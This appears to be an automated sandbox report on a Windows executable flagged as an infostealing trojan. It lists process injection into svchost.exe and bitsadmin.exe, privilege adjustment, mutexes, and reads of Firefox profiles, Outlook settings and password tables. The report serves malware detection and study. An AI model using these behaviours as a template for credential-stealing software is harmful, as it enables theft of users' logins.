Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303EA80	3_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03056962	3_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030429A0	3_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0310A9A6	3_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304A840	3_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03042840	3_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030268B8	3_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306E8F0	3_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03082F28	3_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03060F30	3_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E2F30	3_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B4F40	3_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030BEFA0	3_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03032FC8	3_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304CFE0	3_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FEE26	3_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040E59	3_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03052E90	3_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FCE93	3_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FEEDB	3_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304AD00	3_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DCD1F	3_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03058DBF	3_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303ADE0	3_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040C00	3_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0CB5	3_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030CF2	3_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F132D	3_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302D34C	3_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0308739A	3_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030452A0	3_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305B2C0	3_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E12ED	3_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0307516C	3_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302F172	3_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0310B16B	3_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304B1B0	3_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EF0CC	3_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030470C0	3_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F70E9	3_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FF0E0	3_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FF7B0	3_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03085630	3_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F16CC	3_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F7571	3_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DD5B0	3_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_031095C3	3_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FF43F	3_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03031460	3_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FFB76	3_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305FB80	3_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B5BF0	3_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0307DBF9	3_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FFA49	3_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F7A46	3_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B3A6C	3_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DDAAC	3_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03085AA0	3_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E1AA3	3_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EDAC6	3_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D5910	3_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03049950	3_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305B950	3_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030AD800	3_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030438E0	3_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FFF09	3_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03041F92	3_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FFFB1	3_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03049EB0	3_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03043D40	3_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F1D5A	3_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F7D73	3_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305FDC0	3_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B9C32	3_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FFCF2	3_2_030FFCF2

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: String function: 00420AE3 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 111 times

Source: uG3I84bQEr.exe, 00000000.00000003.2236890477.0000000004DED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs uG3I84bQEr.exe
Source: uG3I84bQEr.exe, 00000000.00000003.2232408790.0000000004C43000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs uG3I84bQEr.exe
Source: uG3I84bQEr.exe, 00000000.00000003.2231083417.0000000003F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs uG3I84bQEr.exe
Source: uG3I84bQEr.exe, 00000000.00000003.2222843624.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs uG3I84bQEr.exe

Source: uG3I84bQEr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: uG3I84bQEr.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: uG3I84bQEr.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@9/9@6/6

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00B7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B7CBD0

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

File created: C:\Users\user\AppData\Roaming\698ab73320bfb682.bin

Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-698ab73320bfb682-inf
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-698ab73320bfb682ef280244-b

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

File created: C:\Users\user\AppData\Local\Temp\autF5B2.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2703170828.0000000002E69000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2705828064.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3470880703.0000000002E8D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2703170828.0000000002E8D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: uG3I84bQEr.exe	ReversingLabs: Detection: 81%
Source: uG3I84bQEr.exe	Virustotal: Detection: 80%

Source: unknown	Process created: C:\Users\user\Desktop\uG3I84bQEr.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: uG3I84bQEr.exe

Static file information: File size 1762816 > 1048576

Source: uG3I84bQEr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: uG3I84bQEr.exe, 00000000.00000003.2222768330.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bGPwjAWMEtES.exe, 00000006.00000000.2420600558.0000000000DDE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x153c1a

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B0CAh; ret	0_2_00B5B061
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B30Dh; ret	0_2_00B5B1E6
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B2F2h; ret	0_2_00B5B262
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B255h; ret	0_2_00B5B2ED
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B2D0h; ret	0_2_00B5B346
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B5B180 push 00B5B37Fh; ret	0_2_00B5B3B7
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7852Eh; ret	0_2_00B77F3A
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78514h; ret	0_2_00B77F66
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B77E66h; ret	0_2_00B78057
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7817Ah; ret	0_2_00B7808B
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B782E5h; ret	0_2_00B780D9
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7826Ah; ret	0_2_00B7819E
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7849Ch; ret	0_2_00B781E4
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78321h; ret	0_2_00B782E0
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B77FBFh; ret	0_2_00B7831F
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B77FA8h; ret	0_2_00B7834C
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B784BAh; ret	0_2_00B783E2
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78426h; ret	0_2_00B784D8
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78075h; ret	0_2_00B784FD
